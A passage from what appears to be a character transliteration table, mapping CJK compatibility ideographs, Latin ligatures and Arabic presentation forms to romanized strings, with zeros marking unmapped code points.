0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"qi","geng","che","jia","hua","chuan","ju","gui","gui","qi","jin","la","nai","lan","lai","luo","luo","luo","luo","luo","le","luo","lao","luo","luo","lao","luo","luan","luan","lan","lan","lan","luan","lan","lan","lan","lan","la","la","la","lang","lang","lang","lang","lang","lai","leng","lao","lu","lu","lu","lu","lao","lu","lu","lu","lu","lu","lu","lu","lu","lu","lu","lu","lu","lun","long","nong","long","long","lao","lei","lu","lei","lei","lu","lou","lei","lou","lei","lu","lou","lei","le","lin","ling","leng","ling","ling","ling","du","na","le","nuo","dan","ning","nu","lu","yi","bei","pan","bian","fu","bu","mi","shu","suo","can","sai","sheng","ye",
"shuo","sha","chen","chen","shi","ruo","e","e","liang","liang","liang","liang","liang","liang","liang","liang","li","lu","nu","lu","lu","lu","li","lu","li","li","li","li","li","li","li","nian","lian","lian","nian","lian","lian","lian","nian","lian","lian","nian","lian","lian","lian","lie","lie","yan","lie","lie","shuo","lian","nian","nian","lian","lian","lie","ling","ling","ning","ling","lian","ling","ying","ling","ling","ling","ling","ling","ling","li","li","li","li","e","le","liao","liao","niao","liao","le","liao","liao","liao","liao","long","yun","ruan","liu","chou","liu","liu","liu","liu","liu","liu","niu","lei","liu","lu","lu","lun","lun","lun","lun","lu","li","li","lu","long","li","li","lu","yi","li","li","ni","li","li","li","li","li","li","li","ni","ni","lin","lin","lin",
"lin","lin","lin","lin","lin","lin","lin","li","li","li","zhuang","zhi","shi","shen","cha","ci","qie","du","ta","tang","zhai","dong","bao","fu","xing","jiang","jian","kuo","wu","hu",0,0,"zhong",0,"qing",0,0,"xi","zhu","yi","li","shen","xiang","fu","jing","jing","yu",0,"qiu",0,"zhu",0,0,"yi","dou",0,0,0,"fan","si","guan","he","lang","li","wu","seng","mian","mian","qin","bei","he","tan","qi","ping","mo","ceng","che","hui","kai","zeng","cheng","min","ji","shu","mei","hai","zhu","han","zhu","zhao","zuo","bei","she","zhi","qi","you","zu","zhu","huo","zhen","gu","tu","jie","lian","jin","fan","shu","zhe","chou","cao","cao","zhe","he","shi","ye","jin","bin","zeng","chuo","yi","nan","xiang","pin","hui",0,"guan",0,0,"bing",
"kuang","quan","xing","chong","ji","yong","shao","he","tao","hui","wa","zhong","fen","yan","ben","bi","ci","ao","yi","cai","yao","wang","shen","yu","zeng","ao","cheng","dai","yu","sou","bing","ao","qing","lang","wang","zhang","dai","sha","liu","yin","zi","han","jing","zhu","qiao","jue","fan","zhu","zhen","ci","hua","guan","wen","yi","sheng","zhi","juan","zhe","tian","tiao","jie","lei","tao","lian","ping","zhe","huang","hua","yun","qiang","fu","shi","diao","zhu","qing","ye","nuo","yu","jin","bian","zeng","shu","chi","sou","xing","zhu","nan","jing","bai","xiang","e","pin","zhen","gui",0,0,0,"he","xie","jie",0,"qian","beng","e","pang",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,"ff","fi","fl","ffi","ffl","st","st",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"yi",0,"yya",0,0,"d","h","k","l","m","r","t",0,"s","s","s","s",0,0,0,"b","g","d","h","w","z",0,"t","y","k","k","l",0,"m",0,"n","s",0,"p","p",0,"z","q","r","s","t","wo","b","k","p",0,0,0,0,0,0,0,"p","p","p","p",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"v","v","v","v",0,0,0,0,0,
0,0,0,0,0,0,0,"ch","ch","ch","ch",0,0,0,0,0,0,0,0,0,0,0,0,"zh","zh",0,0,"k","k","k","k","g","g","g","g",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"ng","ng","ng","ng",0,0,0,0,0,0,0,"v","v",0,0,0,0,0,0,0,0,"y","y","ya","ya",0,0,"yw","yw",0,0,0,0,
0,0,0,0,0,"yy","yy","yy","y","y","y","y","yj","yh","ym","yy","yy","bj","bh","bkh","bm","by","by","tj","th","tkh","tm","ty","ty","thj","thm","thy","thy","jh","jm","hj","hm","khj","khh","khm","sj","sh","skh","sm","sh","sm","dj","dh","dkh","dm","th","tm","zm",0,0,"ghj","ghm","fj","fh","fkh","fm","fy","fy","qh","qm","qy","qy","ka","kj","kh","kkh","kl","km","ky","ky","lj","lh","lkh","lm","ly","ly","mj","mh","mkh","mm","my","my","nj","nh","nkh","nm","ny","ny","hj","hm","hy","hy","yj","yh","ykh","ym","yy","yy","dh","r","y",0,0,0,0,0,0,"yr","yz","ym","yn","yy","yy","br","bz","bm","bn","by","by","tr","tz","tm","tn","ty",
"ty","thr","thz","thm","thn","thy","thy","fy","fy","qy","qy","ka","kl","km","ky","ky","lm","ly","ly","ma","mm","nr","nz","nm","nn","ny","ny","y","yr","yz","ym","yn","yy","yy","yj","yh","ykh","ym","yh","bj","bh","bkh","bm","bh","tj","th","tkh","tm","th","thm","jh","jm","hj","hm","khj","khm","sj","sh","skh","sm","sh","skh","sm","dj","dh","dkh","dm","th","zm",0,0,"ghj","ghm","fj","fh","fkh","fm","qh","qm","kj","kh","kkh","kl","km","lj","lh","lkh","lm","lh","mj","mh","mkh","mm","nj","nh","nkh","nm","nh","hj","hm","h","yj","yh","ykh","ym","yh","ym","yh","bm","bh","tm","th","thm","thh","sm","sh","shm","shh","kl","km","lm","nm","nh","ym","yh","a","u","i","ty",
